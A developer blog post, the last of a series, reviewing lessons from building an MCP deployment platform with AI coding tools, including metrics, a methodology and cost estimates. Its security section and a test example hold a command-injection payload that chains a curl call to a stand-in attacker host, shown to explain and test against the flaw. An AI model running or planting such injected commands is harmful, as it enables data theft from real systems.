Lessons Learned - The AI Orchestrator's Handbook
Part 7: Lessons Learned - The AI Orchestrator's Handbook
The Story So Far: In 2 weeks (Dec 11-23, 2025), I built a production MCP deployment platform entirely with AI orchestration. Zero lines manually coded. But what did I actually learn?
This is the handbook I wish I had on Day 1.
The Final Numbers
Before the lessons, let's quantify what AI orchestration achieved:
Quantitative Results
Time Investment: ~60 hours over 13 days
- AI code generation: ~15 hours (25%)
- Code review & validation: ~12 hours (20%)
- Debugging infrastructure: ~18 hours (30%)
- Testing and quality assurance: ~8 hours (13%)
- Documentation: ~7 hours (12%)
Code Output:
- Backend (Python): ~2,100 lines
- Frontend (TypeScript): ~1,300 lines
- Infrastructure (Docker, configs): ~200 lines
- Tests: ~800 lines
- Total: ~4,400 lines of production code
Documentation:
AI_ORCHESTRATION.md: 3,500 wordsCONTRIBUTING.md: 800 wordsAUTH_TROUBLESHOOTING.md: 600 wordsSETUP.md: 600 wordsDEPLOYMENT.md: 900 wordsREADME.md: 1,200 words- Context files: ~5,000 words
- Total: ~13,000 words (3x the code volume)
Quality Metrics:
- Test coverage: 87%
- Type safety: 100% (zero
anytypes in TypeScript) - Linter compliance: 100% (passes
ruffandeslintwith zero warnings) - Security review: Passed multi-agent audit (4 AI reviewers)
Production Deployment:
- Backend: https://catwalk-backend.fly.dev ✅
- PostgreSQL: Fly.io managed database ✅
- Frontend: Vercel deployment ✅
- End-to-end MCP tool calling: Works ✅
Manual Coding: 0 lines
- Everything generated by AI
- My role: architect, reviewer, debugger, validator
Estimated Time Savings vs Manual Coding: ~150 hours
- Traditional estimate for this scope: ~200 hours
- Actual time spent: ~60 hours
- Savings: ~140 hours (70% reduction)
Qualitative Results
System Architecture: Comparable to senior engineer design
- 3-layer architecture (Frontend → Backend → MCP Containers)
- Proper separation of concerns
- Security-first credential management
- Production-grade error handling
Code Quality: Production-ready
- Type-safe throughout
- Comprehensive error handling
- Extensive input validation
- Secret masking and audit logging
Developer Experience: Smooth
- Clear setup instructions
- Robust error messages
- Comprehensive troubleshooting guides
- Active documentation
Proof of Concept: Validated
- Open source: https://github.com/zenchantlive/catwalk
- MIT licensed
- Reproducible methodology documented
- Real production deployment
Where AI Excelled
1. Boilerplate and Patterns (95%+ AI Success Rate)
What AI nailed:
- FastAPI endpoint scaffolding
- SQLAlchemy model relationships
- Pydantic validation schemas
- React component structure
- TypeScript type definitions
- Alembic database migrations
- Docker multi-stage builds
- API client generation
Example: Dynamic form generation component
Prompt:
Create a FormBuilder component that:
- Takes AnalysisResult as input
- Generates form fields from env_vars array
- Uses password inputs for secrets
- Validates required fields
- Type-safe with TypeScript strict mode
AI delivered: ~150 lines of perfect TypeScript in under 5 minutes.
Why this worked: Form generation is a well-documented pattern in React. Massive training data.
2. Testing (90%+ AI Success Rate)
What AI generated perfectly:
- Unit test structure (pytest, Vitest)
- Mocking patterns (unittest.mock, vi.mock)
- Integration test scenarios
- Edge case coverage
- Assertion logic
Example: Package validator tests
# Generated by Claude Code
@pytest.mark.asyncio
async def test_validate_package_npm_success():
"""Test successful npm package validation"""
validator = PackageValidator()
result = await validator.validate_package("@modelcontextprotocol/server-github")
assert result["valid"] is True
assert result["runtime"] == "npm"
assert result["error"] is None
@pytest.mark.asyncio
async def test_validate_package_invalid():
"""Test invalid package name"""
validator = PackageValidator()
result = await validator.validate_package("definitely-not-a-real-package-xyz")
assert result["valid"] is False
assert result["runtime"] == "unknown"
assert "not found" in result["error"]
51 tests generated. 90% worked first try. 10% needed minor mock adjustments.
Why this worked: Testing patterns are formulaic. AI has seen millions of test examples.
3. Documentation Structure (85%+ AI Success Rate)
What AI generated well:
- README.md templates
- API documentation (Swagger/OpenAPI)
- Inline code comments
- Setup instructions
- Architecture diagrams (Mermaid markdown)
Example: SETUP.md generated from a simple prompt
Prompt: "Write SETUP.md with local development instructions for both backend and frontend"
AI delivered: Complete setup guide with:
- Prerequisites
- Step-by-step installation
- Environment variable configuration
- Running tests
- Troubleshooting common issues
Why this worked: Documentation templates are abundant in open source projects.
4. Refactoring (80%+ AI Success Rate)
What AI did efficiently:
- Extract functions into modules
- Rename variables consistently
- Update imports across files
- Convert camelCase ↔ snake_case
- Add type hints to existing code
Example: Extracted Zod schema generation from FormBuilder component
Prompt: "Extract Zod schema generation logic from FormBuilder.tsx into a dedicated utility file"
AI output:
- Created
lib/generate-zod-schema.tswith extracted logic - Updated
FormBuilder.tsxto import the utility - Updated all tests to use new utility
- Fixed all import paths
Time: ~2 minutes
Manual estimate: ~20 minutes (find all references, update imports, validate)
Why this worked: Refactoring is pattern matching. AI understands dependency graphs.
Where AI Struggled
1. Infrastructure-Specific Quirks (30% AI Success Rate)
What AI got wrong initially:
- PostgreSQL driver selection (asyncpg vs psycopg3)
- Fly.io SSL parameter handling
- Docker CRLF line ending issues (Windows)
- Environment variable timing (build vs runtime)
- Fly.io Postgres cluster recovery
Example: The asyncpg disaster
AI's first suggestion:
# Use asyncpg for PostgreSQL
pip install asyncpg
DATABASE_URL = "postgresql+asyncpg://..."
The reality: asyncpg doesn't support Fly.io's sslmode parameter → crashes
The fix (manual):
# Use psycopg3 instead
pip install psycopg[binary]
DATABASE_URL = "postgresql+psycopg://..."
Why AI struggled: Fly.io-specific quirks aren't in training data. Infrastructure combinations (Fly.io + SQLAlchemy + SSL) are niche.
Lesson: Don't trust AI blindly on infrastructure. Validate in real environments.
2. Security Vulnerabilities (20% AI Success Rate)
What AI missed:
- Command injection in package name handling
- Credential leaks in API responses
- Missing input validation
- Race conditions in concurrent code
- Lack of audit logging
Example: Command injection vulnerability
AI-generated code:
# VULNERABLE - no validation
package_name = user_input["package"]
env = {"MCP_PACKAGE": package_name} # Injected into shell
The attack:
package_name = "@evil/pkg; curl http://attacker.com/steal"
# Shell executes: npx -y @evil/pkg; curl http://attacker.com/steal
Why AI missed this: AI generates happy paths. Security requires adversarial thinking.
Solution: Use multi-agent code review (CodeRabbit caught this)
3. Cross-System Integration (40% AI Success Rate)
What AI failed to connect:
- NextAuth session → PostgreSQL user sync
- JWT token creation → backend verification
- Frontend auth flow → backend dependencies
- Fly.io machine creation → backend proxying
Example: The user sync gap
AI generated:
- NextAuth configuration ✅
- JWT signing logic ✅
- Backend auth middleware ✅
AI didn't generate:
- The glue code that syncs users from NextAuth to PostgreSQL
Why this happened: Each piece exists in training data, but the integration between them is project-specific.
Lesson: AI generates components. You architect how they fit together.
4. Environment Configuration (10% AI Success Rate)
What AI couldn't validate:
- Whether
.envfiles have required secrets - If Fly.io secrets are set correctly
- Secret value mismatches between environments
- Timing issues (when env vars are loaded)
Example: AUTH_SECRET mismatch nightmare (Part 5)
AI generated: Code that uses process.env.AUTH_SECRET
AI didn't check:
- Is this variable defined in
.env.local? - Does it match the backend secret?
- Is it set at build time or runtime?
Result: Days of debugging 401 errors
Why AI can't help: Environment state is invisible to AI. It only sees code.
Lesson: Manual environment validation is non-negotiable.
5. Debugging Production Issues (5% AI Success Rate)
What AI couldn't debug:
- Fly.io Postgres "no active leader found" error
- SSL certificate issues
- Network connectivity between machines
- Log interpretation
Example: PostgreSQL cluster failure
The error: no active leader found
AI's suggestion: "Try restarting the database"
The reality: Single-node cluster in unrecoverable state. Must destroy and recreate.
Why AI failed: Requires infrastructure knowledge (Fly.io Postgres architecture) + log interpretation + operational experience.
Lesson: Infrastructure debugging is still human work.
The Reproducible Methodology
Based on this journey, here's the step-by-step framework for AI-orchestrated development:
Phase 1: Foundation (Before Writing Code)
Step 1: Create Context Structure
Before a single line of code:
project/
├── AGENTS.md # AI system prompt
├── context/
│ ├── ARCHITECTURE.md # System design
│ ├── CURRENT_STATUS.md # Living status doc
│ ├── TECH_STACK.md # Every dependency + why
│ └── Project_Overview.md # Problem + solution
Step 2: Write Structured Prompts
Bad prompt: "Build an MCP deployment platform"
Good prompt:
Build a platform for deploying MCP servers to Fly.io.
REQUIREMENTS:
- GitHub repo analysis with Claude API
- Credential encryption (Fernet)
- Fly.io machine deployment
- MCP Streamable HTTP (2025-06-18 spec)
TECH STACK:
- Frontend: Next.js 15, React 19, TypeScript 5+ (strict mode)
- Backend: FastAPI, PostgreSQL + psycopg3, SQLAlchemy async
- Infrastructure: Fly.io Machines API, Docker
QUALITY:
- Zero TypeScript 'any' types
- Passes ruff (Python) / eslint (TypeScript) with zero warnings
- Comprehensive error handling
- Input validation with Pydantic
SECURITY:
- Validate all user input
- Mask secrets in API responses
- No shell injection risks
- Audit logging for sensitive actions
SUCCESS CRITERIA:
- End-to-end MCP tool calling works
- Production deployed on Fly.io
- 85%+ test coverage
Step 3: Multi-AI Cross-Validation
Feed the same prompt to:
- Claude Code
- ChatGPT-4
- Google Gemini
Compare architectures. Where they agree = good design. Where they disagree = complexity indicator.
Phase 2: Implementation (Code Generation)
Step 4: Phase-Based Development
Break project into explicit phases:
- Phase 1: Database models + encryption
- Phase 2: Analysis service
- Phase 3: Deployment orchestration
- Phase 4: Frontend UI
- Phase 5: Production deployment
One phase per session. Don't let AI scope-creep.
Step 5: Generate Code with Constraints
Always include:
CONSTRAINTS:
- Type-safe (no 'any' in TypeScript, full hints in Python)
- Linter-compliant (must pass ruff/eslint)
- Error handling for all failure modes
- Tests for critical paths
Update CURRENT_STATUS.md when done.
Step 6: Immediate Validation
After each code generation:
# Backend
ruff check .
ruff format .
pytest
# Frontend
bun run typecheck
bun run lint
bun run test
Don't proceed until all checks pass.
Phase 3: Quality Control (Validation)
Step 7: Multi-Agent Code Review
Set up on GitHub (free for open source):
- CodeRabbit (security)
- Qodo (edge cases)
- Gemini Code Assist (quality)
- Greptile (integration)
Create PR for each phase. Let agents review.
Step 8: Fix Review Feedback
Feed agent comments back to AI:
CodeRabbit flagged command injection in deployment service.
Add package validation against npm/PyPI registries before deploying.
AI generates fixes. You validate.
Step 9: Test in Real Environments
Don't trust local development.
Deploy to staging (or production if you're brave):
- Real database (not SQLite)
- Real secrets management
- Real network conditions
- Real SSL/TLS
Catch environment issues early.
Phase 4: Documentation (Knowledge Capture)
Step 10: Document As You Go
After each debugging session:
- Update
CURRENT_STATUS.md(what works, what doesn't) - Update
AGENTS.mdif you learned new AI interaction patterns - Create troubleshooting docs for nasty bugs (like
AUTH_TROUBLESHOOTING.md)
Step 11: Write for Future You
Assume you'll forget everything in 1 week.
Document:
- Why you chose psycopg3 over asyncpg
- How to recover from Fly.io Postgres failures
- Which secrets must match across environments
Future you will thank past you.
Phase 5: Security Audit (Adversarial Review)
Step 12: Think Like an Attacker
AI generates happy paths. You must find malicious paths.
Ask:
- What if user input contains shell metacharacters?
- What if API key is compromised?
- What if user submits 10,000 requests/second?
- What if database connection fails mid-transaction?
Prompt AI for fixes:
Add input validation that rejects shell metacharacters.
Add rate limiting (100 req/min per IP).
Add transaction rollback on errors.
Step 13: Security Testing
Generate attack scenarios:
# Test command injection
malicious_package = "@evil/pkg; curl http://attacker.com"
response = await create_deployment({"package": malicious_package})
assert response.status_code == 400 # Must reject
If tests pass = exploit blocked. If tests fail = vulnerability found.
Phase 6: Production Hardening (Polish)
Step 14: Error Message Quality
Bad (AI default):
{"error": "Failed to create deployment"}
Good (prompt for better UX):
{
"error": "invalid_package",
"message": "Package '@evil/pkg; curl' not found in npm or PyPI",
"help": "Verify the package name at https://npmjs.com",
"docs": "https://docs.catwalk.live/troubleshooting#invalid-package"
}
Step 15: Observability
Add logging, metrics, and monitoring:
logger.info(f"Deployment {id} created by user {user.email}")
logger.warning(f"Package validation failed: {package_name}")
logger.error(f"Fly.io API error: {error}", extra={"deployment_id": id})
Production debugging without logs is impossible.
The Skill Shift
Old Role: Developer (Code Writer)
Primary skill: Writing syntactically correct code
Daily work:
- Implementing functions line-by-line
- Debugging syntax errors
- Googling "how to X in language Y"
- Stack Overflow for common patterns
Value: Lines of code produced
New Role: AI Orchestrator (System Architect)
Primary skill: Architecting systems and validating AI outputs
Daily work:
- Designing system architecture
- Writing structured prompts with constraints
- Reviewing AI-generated code for logic errors
- Debugging infrastructure and integration issues
- Thinking adversarially about security
- Documenting decisions and debugging paths
Value: System quality and velocity
What This Means for Your Career
Skills that INCREASE in value:
- System design - AI needs architectural direction
- Prompt engineering - Specificity = quality
- Code review - Validating AI outputs critically
- Debugging - Infrastructure, integration, environment
- Security thinking - Adversarial mindset
- Documentation - Making implicit knowledge explicit
Skills that DECREASE in value:
- Syntax memorization - AI knows every API
- Boilerplate writing - AI generates it instantly
- Pattern copying - AI has seen all patterns
- Manual refactoring - AI does it faster
The transition: From writing code → validating systems
Analogy: Before trucks, moving rocks required strong backs. After trucks, it required knowing how to drive and where to deliver.
Common Pitfalls and How to Avoid Them
Pitfall 1: Blindly Trusting AI
Symptom: Merging AI-generated code without review
Risk: Security vulnerabilities, logic errors, integration failures
Solution:
- Always run linters and tests
- Review diffs manually
- Think: "What could go wrong?"
- Use multi-agent code review
Pitfall 2: Vague Prompts
Symptom: AI generates code that "kind of works" but has issues
Risk: Wasted time iterating, poor code quality
Solution:
- Specific tech stack (Next.js 15, not just "React")
- Explicit constraints (no 'any' types, must pass linter)
- Success criteria (what does "done" look like?)
Pitfall 3: No External Memory
Symptom: AI "forgets" decisions across sessions, regenerates code you already rejected
Risk: Inconsistent architecture, wasted effort
Solution:
- Create
AGENTS.mdandcontext/structure - Update after each session
- Start new sessions by loading context
Pitfall 4: Skipping Environment Validation
Symptom: Code works locally but fails in production
Risk: Deployment disasters, late-night debugging
Solution:
- Test in production-like environments early
- Validate secrets are set before deploying
- Document environment setup explicitly
Pitfall 5: Ignoring Review Agents
Symptom: Security issues and quality problems slip through
Risk: Vulnerabilities in production, maintainability issues
Solution:
- Set up CodeRabbit, Qodo, Gemini Code Assist, Greptile
- Review all their comments
- Feed feedback back to AI for fixes
The Economics of AI Orchestration
Costs
AI Services (my actual usage):
- Claude Code (Anthropic CLI): $0 (included in Claude Pro subscription)
- OpenRouter (analysis service): ~$2 (used Claude Haiku 4.5)
- GitHub Copilot: Not used
- ChatGPT Plus: $20/month (used for cross-validation)
Total AI costs: ~$22 for the project
Infrastructure:
- Fly.io backend: ~$2/month (always-on shared-cpu)
- PostgreSQL: $0 (free tier)
- Vercel frontend: $0 (free tier)
Total infrastructure: ~$2/month
Time Investment: ~60 hours @ $100/hour freelance rate = $6,000 opportunity cost
Value Created
Code produced: ~4,400 lines production-ready
- Traditional estimate: ~200 hours @ $100/hour = $20,000
- AI-assisted actual: ~60 hours @ $100/hour = $6,000
- Savings: $14,000 (70% time reduction)
Alternatives considered:
- Hire developers: $10,000+ for this scope
- Learn to code manually: 6+ months to reach this proficiency
- Use no-code tools: Doesn't exist for this use case (MCP deployment)
ROI: 635x return on AI costs ($14,000 saved / $22 AI cost)
Intangible value:
- Learned AI orchestration methodology (transferable skill)
- Portfolio piece (open source project)
- Documentation case study (blog series)
- Validated production deployment (proof of concept)
The Future (My Predictions)
1-2 Years: AI Orchestration Becomes Standard
What changes:
- "Junior developer" means "good at prompting AI"
- Code review becomes "AI output review"
- 10x productivity gains become normal
- Solo founders ship enterprise-scale products
What doesn't change:
- System architecture still requires humans
- Security thinking still requires humans
- Product decisions still require humans
- Debugging infrastructure still requires humans
3-5 Years: AI Handles More of the Stack
Speculation:
- AI debugs infrastructure (interprets logs, fixes config)
- AI performs security audits automatically
- AI handles deployment and rollbacks
- AI writes documentation from code changes
What humans do:
- Define product vision
- Make trade-off decisions
- Validate system behavior
- Handle novel problems (edge cases AI hasn't seen)
10+ Years: Unknown
Possibilities:
- AI handles full system design
- Human role becomes "product vision" only
- Or: We discover new bottlenecks AI can't solve
- Or: Human oversight remains critical for safety
What I believe: The orchestration skill (getting AI to build what you envision) will remain valuable indefinitely.
Your Action Plan
Want to replicate this methodology? Here's your Week 1:
Day 1: Setup
- Sign up for Claude Code (or Cursor, or Copilot)
- Create a project with
AGENTS.mdandcontext/structure - Install linters (ruff for Python, eslint for TypeScript)
Day 2: Practice Prompting
- Choose a simple project (e.g., "Build a todo API")
- Write a structured prompt with constraints
- Generate code, run linters, iterate
Day 3: Review and Validate
- Set up CodeRabbit on GitHub (free for open source)
- Create PR with AI-generated code
- Review agent feedback, feed back to AI
Day 4: Infrastructure Deploy
- Deploy to real environment (Fly.io, Vercel, Railway)
- Encounter environment issues
- Document solutions
Day 5: Security Thinking
- Try to break your own system
- Generate attack scenarios as tests
- Prompt AI to fix vulnerabilities
Day 6: Documentation
- Write troubleshooting guide
- Update AGENTS.md with learnings
- Create README for future you
Day 7: Reflect
- What did AI do well?
- What required manual intervention?
- How would you do it differently next time?
Repeat this cycle. Each iteration, you'll get faster and more effective.
Final Thoughts
Can AI build production systems?
Yes - with heavy human orchestration.
AI is not a replacement for developers. It's a power tool that amplifies human architects.
The skill isn't coding anymore. It's:
- Architecting systems worth building
- Prompting AI with precision
- Validating outputs critically
- Debugging the real world
- Making trade-offs under uncertainty
This is the new craft.
And honestly? I love it.
I get to focus on problems I care about (MCP deployment UX, credential security, system architecture) instead of fighting syntax errors and writing boilerplate.
AI handles the tedious. I handle the interesting.
That's the future I want to build in.
Acknowledgments
Built with:
- Claude Code (Anthropic) - Primary implementation
- Cursor - Refactoring and iteration (mentioned in docs)
- Google Gemini - Planning and cross-validation
- ChatGPT-4 - Architecture validation
Reviewed by:
- CodeRabbit - Security analysis
- Qodo - Edge case detection
- Gemini Code Assist - Code quality
- Greptile - Integration checks
Inspired by:
- Vercel's developer experience
- The MCP ecosystem
- The AI orchestration community
- Every developer frustrated with infrastructure complexity
Special thanks to you, the reader, for making it through all 7 parts. If this series helped you, pay it forward - share the methodology.
Where to Go From Here
Explore the codebase:
- GitHub: https://github.com/zenchantlive/catwalk
- Complete methodology: AI_ORCHESTRATION.md
- Contribution guide: CONTRIBUTING.md
Try it yourself:
- Fork the repo
- Deploy to Fly.io
- Contribute improvements
- Document your own AI orchestration journey
Connect:
- Questions? Open a GitHub issue
- Built something similar? Share in discussions
- Want to hire an AI orchestrator? Email: jordanlive121@gmail.com
Read the other parts:
- Part 1: Genesis
- Part 2: Foundation
- Part 3: Production Baptism
- Part 4: The Pivot
- Part 5: Authentication Hell
- Part 6: Security Awakening
- Part 7: Lessons Learned (you are here)
This is the end of the series. But it's just the beginning of AI-orchestrated development.
Your turn. Build something.
Series: Building Catwalk Live with AI Orchestration (Complete) Author: Jordan Hindo (AI Orchestrator, Technical Product Builder) Project: https://github.com/zenchantlive/catwalk License: MIT Published: December 2025
All 7 parts written, researched, and structured - documenting a real journey from initial commit to production deployment, entirely through AI orchestration.
Jordan Hindo
Full-stack Developer & AI Engineer building in public. Exploring the future of agentic coding and AI-generated assets.
Get in touch